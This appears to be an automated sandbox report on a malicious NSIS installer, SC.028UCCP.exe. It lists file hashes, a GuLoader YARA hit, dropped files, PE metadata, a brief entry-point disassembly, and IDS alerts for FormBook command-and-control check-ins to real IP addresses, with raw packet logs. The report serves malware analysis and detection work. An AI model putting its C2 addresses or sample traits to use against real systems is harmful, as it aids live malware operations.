                                                                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                      Number of analysed new started processes analysed:17
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample file name:SC.028UCCP.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winEXE@8/4@24/16
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HDC Information:
                                                                      • Successful, ratio: 16% (good quality ratio 15.4%)
                                                                      • Quality average: 80.5%
                                                                      • Quality standard deviation: 25.7%
                                                                      HCA Information:
                                                                      • Successful, ratio: 87%
                                                                      • Number of executed functions: 0
                                                                      • Number of non-executed functions: 0
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, UserOOBEBroker.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, svchost.exe, UsoClient.exe
                                                                      • TCP Packets have been reduced to 100
                                                                      • Excluded IPs from analysis (whitelisted): 51.105.236.244, 104.17.167.40, 104.17.168.40, 104.17.169.40, 104.17.170.40, 104.17.171.40
                                                                      • Excluded domains from analysis (whitelisted): www.rentcafecloudflarecn.com.cdn.cloudflare.net, client.wns.windows.com, wdcpalt.microsoft.com, slscr.update.microsoft.com, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, ctldl.windowsupdate.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      No simulations
                                                                      No context
                                                                      No context
                                                                      No context
                                                                      No context
                                                                      No context
                                                                      Process:C:\Users\user\Desktop\SC.028UCCP.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):268768
                                                                      Entropy (8bit):7.143396451103385
                                                                      Encrypted:false
                                                                      SSDEEP:6144:qJAA/mPgVn081S1KOqpIrh02aq18CUcmQd:TA/moVw1HP02J8CUcVd
                                                                      MD5:C6AF2E59D4C09946D5F809241D770F50
                                                                      SHA1:266B1073C52D94E9451AA08B2605F2237E5F8A0C
                                                                      SHA-256:89E42F99BB457998B2FA3A4D0973ABFE9A39163227F56C8D000CCE44F1EF0070
                                                                      SHA-512:B005D4324152790A8BDAAAEE6272A899639FF8D5E1E1FFE1E1219C569F9D271C4A21440F709CA3693A5F80A664501D3AB79EBA81B5B9D07C8870FE5AC15D5124
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\Patter.Lam, Author: Joe Security
                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\SC.028UCCP.exe
                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, components 3
                                                                      Category:dropped
                                                                      Size (bytes):5717
                                                                      Entropy (8bit):7.862470085974542
                                                                      Encrypted:false
                                                                      SSDEEP:96:BSTzREom7JPxQ7OTst5UcVq9JD6EgZEoW249KONYq9iwry9t1Bs6UQJaE424CZ:oXRgtPEOa6+q65Zr87YXwry9tzuCZ
                                                                      MD5:B182207A878FA708746DA5A94F08A581
                                                                      SHA1:4EF329C2643A9B5E19F491D644A96EF3E7388BE6
                                                                      SHA-256:40125E69AA66C655FA44F83BBDEB7E9F24FE81D69CC717651A42C908483FF687
                                                                      SHA-512:2368E6533A4D660C08C6F196F38CE2F706C8486AA9E5B1C2413988251184D6A928A348E74DDF0FB098F928D7FCFA4DD71829766E1964E3E5085D642497D034B4
                                                                      Malicious:false
                                                                      Preview:......JFIF.....d.d.....:Exif..MM.*......Q...........Q..........aQ..........a.......C....................................................................C.......................................................................n.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......9o.^....3N>-.~..-......j.|w.Vu..n..N...#...c......a...M.$......n:..m....?..z..1...^_.1.iE..]O.9..|.6.b.E.vVF..h6.i.=|...~.....H.|.^.U.W.@6..}vz..^ON+....M......{......2OZ..=..@w,..c#..`s.A>....O.<.iw9Y....V...Qx_...@6..';Bg.;...J~...2.#.........~.2:..#..0k.6.K...[k.V....>c.98.-..=..Z&...W.:......
                                                                      Process:C:\Users\user\Desktop\SC.028UCCP.exe
                                                                      File Type:GTA audio index data (SDT)
                                                                      Category:dropped
                                                                      Size (bytes):42868
                                                                      Entropy (8bit):4.531239376712852
                                                                      Encrypted:false
                                                                      SSDEEP:768:BmzeD2YSUGt8UN3/hCwqfWCixEmPmXZNIYmhaspQZV:BF9SfyUNvrxEmMAHpQT
                                                                      MD5:545F37C048EB23C04FF82F592FB89DEB
                                                                      SHA1:9ED7C0D724A7A1C7E38F2A5134D1325B49FCCF25
                                                                      SHA-256:DA3CADFEE6D3939C607B6F60B12861931ABD8E7441A2C148C396A38957C7D4DF
                                                                      SHA-512:0EB46B15043855818821DD3C60A491E83DF943A30E3BC57E9D37F81AAFF697DFFEF94CE8874A1F61E1E93B7BA2FD740E4FAF7E267BFB1B5B708F1979ED292655
                                                                      Malicious:false
                                                                      Preview:........zz.......++..........^^^...............l....................."".R..............6......cccccc.B.....(..}}....>>>>>.B.?.C..J.O..yy.....C.....!!..MMMM........pp.......................P...'................g.CC...ww........K.......9.;;....X.........W.....6.....%.........+.........ll..........@..CCCC...0.555................R.......iiii...333.....g..WWW........M...........................D.r..............................A.L.[..........5..,........P..X.....................kkkkk...................w............VVVV.......?...........................+...................................gggg.$.......DDDD.??..........m.............................r......`............;.......bb..ZZ.....................z......O...QQ.....!.....................XX......X.........???.>>>.P............L....O.{...............v..........ff.....!!!...K....6........................#....eee...........?......9...........;...........o......``................................kkk..............U...;;;.......$............h....
                                                                      Process:C:\Users\user\Desktop\SC.028UCCP.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):11264
                                                                      Entropy (8bit):5.72460245623286
                                                                      Encrypted:false
                                                                      SSDEEP:96:3IsUxO9udx4qYp7AJb76BykUbQMtHUOA5Iv+RnsrqeXV+d1g2IW9t2c+cEwF9oug:YVL7ikJb76BQUoUm+RnyXVYO2RvHoug
                                                                      MD5:CF85183B87314359488B850F9E97A698
                                                                      SHA1:6B6C790037EEC7EBEA4D05590359CB4473F19AEA
                                                                      SHA-256:3B6A5CB2A3C091814FCE297C04FB677F72732FB21615102C62A195FDC2E7DFAC
                                                                      SHA-512:FE484B3FC89AEED3A6B71B90B90EA11A787697E56BE3077154B6DDC2646850F6C38589ED422FF792E391638A80A778D33F22E891E76B5D65896C6FB4696A2C3B
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L...k..Q...........!.................&.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...h....@.......&..............@....reloc..H....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Entropy (8bit):7.920107350850815
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:SC.028UCCP.exe
                                                                      File size:267392
                                                                      MD5:3f8f4a7f43b5627ed45128bb99f0b471
                                                                      SHA1:1c1931fe8db9b5df89d39e3121fa72c2a355ded1
                                                                      SHA256:0ae741990942bc5b9a51a72dc1cc9f2197b8fe140b76eee9170c3260c00e8656
                                                                      SHA512:800a88ff5985f832c73fbada7fa71175531dbe9bd47a93bc8941817e791d8868cfedd4dad2f82604ce06e1e2136821b963d35e23d580edf2d260475eb213ff6f
                                                                      SSDEEP:6144:4auq7FPth0P6iM7EFsjSHR58yQITE1vE1P57hO5FKHJa:HFPr0SirFjC1yP5NO5FKg
                                                                      TLSH:AE4412172BE645FFF9D78C72103AEAB3F5BBE6580817144E0B266F7A7D00603092969D
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L......Q.................^...........1.......p....@
                                                                      Icon Hash:b2a88c96b2ca6a72
                                                                      Entrypoint:0x40310b
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:true
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x51E3058F [Sun Jul 14 20:09:51 2013 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:b40f29cd171eb54c01b1dd2683c9c26b
                                                                      Signature Valid:false
                                                                      Signature Issuer:E=synsmaades@Lakeside.Fo, OU="Virksomhedsledelsens Tensionerne ", O=Draconis, L=Saint-Projet, S=Nouvelle-Aquitaine, C=FR
                                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                      Error Number:-2146762487
                                                                      Not Before, Not After
                                                                      • 20/08/2022 06:31:00 19/08/2025 06:31:00
                                                                      Subject Chain
                                                                      • E=synsmaades@Lakeside.Fo, OU="Virksomhedsledelsens Tensionerne ", O=Draconis, L=Saint-Projet, S=Nouvelle-Aquitaine, C=FR
                                                                      Version:3
                                                                      Thumbprint MD5:82A2F162C13C97C7C5BD9D1EF5E3E352
                                                                      Thumbprint SHA-1:0A4EF0B597133BD21B48A5030DE4541818CB48DA
                                                                      Thumbprint SHA-256:9B7EDD84EF52310C29E72A78ED7E0EB44C977D6DE7359675C1845C3D1CD29EBC
                                                                      Serial:3E36636B7C2A21B05072BFF828C9540A74C9C941
                                                                      Instruction
                                                                      sub esp, 00000184h
                                                                      push ebx
                                                                      push ebp
                                                                      push esi
                                                                      xor ebx, ebx
                                                                      push edi
                                                                      mov dword ptr [esp+18h], ebx
                                                                      mov dword ptr [esp+10h], 00409190h
                                                                      mov dword ptr [esp+20h], ebx
                                                                      mov byte ptr [esp+14h], 00000020h
                                                                      call dword ptr [00407034h]
                                                                      push 00008001h
                                                                      call dword ptr [004070B0h]
                                                                      push ebx
                                                                      call dword ptr [0040728Ch]
                                                                      push 00000008h
                                                                      mov dword ptr [0042EC58h], eax
                                                                      call 00007FC42CBF7708h
                                                                      mov dword ptr [0042EBA4h], eax
                                                                      push ebx
                                                                      lea eax, dword ptr [esp+38h]
                                                                      push 00000160h
                                                                      push eax
                                                                      push ebx
                                                                      push 00428FE0h
                                                                      call dword ptr [00407164h]
                                                                      push 00409180h
                                                                      push 0042E3A0h
                                                                      call 00007FC42CBF73B2h
                                                                      call dword ptr [0040711Ch]
                                                                      mov ebp, 00434000h
                                                                      push eax
                                                                      push ebp
                                                                      call 00007FC42CBF73A0h
                                                                      push ebx
                                                                      call dword ptr [00407114h]
                                                                      cmp byte ptr [00434000h], 00000022h
                                                                      mov dword ptr [0042EBA0h], eax
                                                                      mov eax, ebp
                                                                      jne 00007FC42CBF499Ch
                                                                      mov byte ptr [esp+14h], 00000022h
                                                                      mov eax, 00434001h
                                                                      push dword ptr [esp+14h]
                                                                      push eax
                                                                      call 00007FC42CBF6E4Dh
                                                                      push eax
                                                                      call dword ptr [00407220h]
                                                                      mov dword ptr [esp+1Ch], eax
                                                                      jmp 00007FC42CBF4A55h
                                                                      cmp cl, 00000020h
                                                                      jne 00007FC42CBF4998h
                                                                      inc eax
                                                                      cmp byte ptr [eax], 00000020h
                                                                      je 00007FC42CBF498Ch
                                                                      Programming Language:
                                                                      • [EXP] VC++ 6.0 SP5 build 8804
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x74b00xb4.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x440000x10b0.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x3fc200x1860.ndata
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x5de80x5e00False0.6791057180851063data6.503326078284377IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x70000x12da0x1400False0.4388671875data5.095966873256735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0x90000x25c980x400False0.63671875data5.037907617207934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .ndata0x2f0000x150000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0x440000x10b00x1200False0.3513454861111111data4.2798158371727295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_BITMAP0x442380x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States
                                                                      RT_ICON0x445a00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                                                      RT_DIALOG0x448880x144dataEnglishUnited States
                                                                      RT_DIALOG0x449d00x13cdataEnglishUnited States
                                                                      RT_DIALOG0x44b100x100dataEnglishUnited States
                                                                      RT_DIALOG0x44c100x11cdataEnglishUnited States
                                                                      RT_DIALOG0x44d300x60dataEnglishUnited States
                                                                      RT_GROUP_ICON0x44d900x14dataEnglishUnited States
                                                                      RT_MANIFEST0x44da80x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States
                                                                      DLLImport
                                                                      KERNEL32.dllSleep, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, CompareFileTime, SearchPathA, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, SetFileAttributesA, lstrcmpiA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, GetCommandLineA, GetTempPathA, FreeLibrary, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, WriteFile, MultiByteToWideChar
                                                                      USER32.dllCreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                                                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                      SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                      ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                      COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                      ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                      VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States
                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      192.168.11.20188.114.97.349822802031449 03/20/23-09:10:34.025355TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982280192.168.11.20188.114.97.3
                                                                      192.168.11.20142.250.186.5149827802031412 03/20/23-09:11:35.414280TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982780192.168.11.20142.250.186.51
                                                                      192.168.11.20104.21.39.11449842802031449 03/20/23-09:15:00.044344TCP2031449ET TROJAN FormBook CnC Checkin (GET)4984280192.168.11.20104.21.39.114
                                                                      192.168.11.20198.185.159.14449830802031412 03/20/23-09:12:15.932254TCP2031412ET TROJAN FormBook CnC Checkin (GET)4983080192.168.11.20198.185.159.144
                                                                      192.168.11.2013.248.157.3249840802031449 03/20/23-09:14:39.545243TCP2031449ET TROJAN FormBook CnC Checkin (GET)4984080192.168.11.2013.248.157.32
                                                                      192.168.11.20165.160.15.2049835802031449 03/20/23-09:13:17.988587TCP2031449ET TROJAN FormBook CnC Checkin (GET)4983580192.168.11.20165.160.15.20
                                                                      192.168.11.20198.185.159.14449830802031453 03/20/23-09:12:15.932254TCP2031453ET TROJAN FormBook CnC Checkin (GET)4983080192.168.11.20198.185.159.144
                                                                      192.168.11.2081.17.29.14749823802031412 03/20/23-09:10:54.265433TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982380192.168.11.2081.17.29.147
                                                                      192.168.11.20198.185.159.14449830802031449 03/20/23-09:12:15.932254TCP2031449ET TROJAN FormBook CnC Checkin (GET)4983080192.168.11.20198.185.159.144
                                                                      192.168.11.20169.60.232.13949844802031449 03/20/23-09:15:33.016841TCP2031449ET TROJAN FormBook CnC Checkin (GET)4984480192.168.11.20169.60.232.139
                                                                      192.168.11.20142.250.186.5149827802031453 03/20/23-09:11:35.414280TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982780192.168.11.20142.250.186.51
                                                                      192.168.11.2081.17.29.14749823802031453 03/20/23-09:10:54.265433TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982380192.168.11.2081.17.29.147
                                                                      192.168.11.20165.160.15.2049835802031412 03/20/23-09:13:17.988587TCP2031412ET TROJAN FormBook CnC Checkin (GET)4983580192.168.11.20165.160.15.20
                                                                      192.168.11.20104.21.39.11449842802031453 03/20/23-09:15:00.044344TCP2031453ET TROJAN FormBook CnC Checkin (GET)4984280192.168.11.20104.21.39.114
                                                                      192.168.11.20142.250.186.5149827802031449 03/20/23-09:11:35.414280TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982780192.168.11.20142.250.186.51
                                                                      192.168.11.20104.21.39.11449842802031412 03/20/23-09:15:00.044344TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984280192.168.11.20104.21.39.114
                                                                      192.168.11.20165.160.15.2049835802031453 03/20/23-09:13:17.988587TCP2031453ET TROJAN FormBook CnC Checkin (GET)4983580192.168.11.20165.160.15.20
                                                                      192.168.11.20195.133.40.4649810802018752 03/20/23-09:09:13.434535TCP2018752ET TROJAN Generic .bin download from Dotted Quad4981080192.168.11.20195.133.40.46
                                                                      192.168.11.20188.114.97.349822802031412 03/20/23-09:10:34.025355TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982280192.168.11.20188.114.97.3
                                                                      192.168.11.2013.248.157.3249840802031453 03/20/23-09:14:39.545243TCP2031453ET TROJAN FormBook CnC Checkin (GET)4984080192.168.11.2013.248.157.32
                                                                      192.168.11.20188.114.97.349822802031453 03/20/23-09:10:34.025355TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982280192.168.11.20188.114.97.3
                                                                      192.168.11.2013.248.157.3249840802031412 03/20/23-09:14:39.545243TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984080192.168.11.2013.248.157.32
                                                                      192.168.11.20169.60.232.13949844802031453 03/20/23-09:15:33.016841TCP2031453ET TROJAN FormBook CnC Checkin (GET)4984480192.168.11.20169.60.232.139
                                                                      192.168.11.20169.60.232.13949844802031412 03/20/23-09:15:33.016841TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984480192.168.11.20169.60.232.139
                                                                      192.168.11.2081.17.29.14749823802031449 03/20/23-09:10:54.265433TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982380192.168.11.2081.17.29.147
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Mar 20, 2023 09:09:13.415043116 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.433906078 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.434035063 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.434535027 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.461829901 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.461865902 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.461916924 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.461976051 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.461987972 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.461999893 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.462011099 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.462033033 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.462148905 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.462148905 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.462148905 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.462148905 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.462148905 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.462148905 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.462156057 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.462157011 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.462286949 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.462486029 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.462655067 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.480679989 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.480778933 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.480791092 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.480807066 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.480822086 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.480833054 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.480844975 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.480881929 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.480894089 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.481041908 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.481046915 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.481046915 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.481046915 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.481046915 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.481046915 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.481046915 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.481054068 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.481067896 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.481082916 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.481095076 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.481220007 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.481228113 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.481229067 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.481230021 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.481230021 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.481355906 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.481355906 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.481369019 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.481369972 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.481525898 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.481694937 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.502079010 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502176046 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502228975 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502242088 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502254963 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502268076 CET4981080192.168.11.20195.133.40.46
                                                                      Mar 20, 2023 09:09:13.502273083 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502286911 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502300024 CET8049810195.133.40.46192.168.11.20
                                                                      Mar 20, 2023 09:09:13.502336025 CET8049810195.133.40.46192.168.11.20
